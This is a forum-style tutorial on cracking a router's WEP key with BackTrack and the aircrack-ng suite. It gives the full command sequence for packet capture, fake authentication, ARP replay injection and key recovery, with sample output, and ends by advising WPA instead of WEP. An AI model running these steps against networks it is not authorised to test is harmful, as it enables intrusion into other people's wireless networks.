Things you need:
-Backtrack 3 or 4
-A wireless network interface card that can inject packets. Most inbuilt wireless card in Singapore does not have the ability, you need buy a one that can.
Around $30 you will be able to get it in SIM LIM. With usb wirelesscard, you are able to do all this in vmware.
Use TP LINK TL-WN321G if you dunno which to buy. I have tested with it and its working well.
-A Router to attack it.
Steps:
-Boot up your pc with backtrack
-Plug in your usb wireless card
-Open 2 terminal console
-For now we will be using just one console, enter "iwconfig" command and check if your wireless card is detected. Just plug out and plug in to see any diference. You should have something like rausb0, different name with different cards.
-rausb0 is your wireless card name in backtrack, you will need to use it alot.
-now start your wireless card by using this command "airmon-ng start rausb0"
-now use this command "airodump-ng rausb0", this will scan for all availiable access point, you will see your router name and mac address. note that down.
-you can stop scanning by issuing the cancel command "crtl-c".
-first we need to collect packets from the router, use this command "airodump-ng -c 6 --bssid <your router MAC address> -w output rausb0"
you should see something like this:
Code: Select all
[CH 6 ][ Elapsed: 1 mins ][ <date and time> ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
<your MAC address> 42 100 5240 10 338 9 54 WEP WEP <your router name>
-the data is the thing that your need to collect, in order to boost the data, we will nid to do the next step
-now go to your another terminal, issue this command to do a fake authentication with the access point, "aireplay-ng -1 0 -e <your router name> -a <your router MAC> -h <your wireless card MAC> rausb0", you can find your wireless MAC address written on the usb card itself.If not use "ifconfig -a" and see the HWaddr.
you should get this:
Code: Select all
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
-After successfully authentication, use this command for ARP request , "aireplay-ng -3 -b <your router MAC> -h <your own wireless MAC addr> rausb0", this will help alot in collecting the data. you should see something like
Code: Select all
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
-Now to bruteforce the WEP key, use this command "aircrack-ng -b <your router MAC> output*.cap"
You should get the WEP key =)
All 2wire default wep password is crackable.
Lesson of the day: Use WPA with a strong password. WEP is totally crackable in less than 15min.
Feel free to ask queston if you stuck at any part or i have any error in the tutorial.
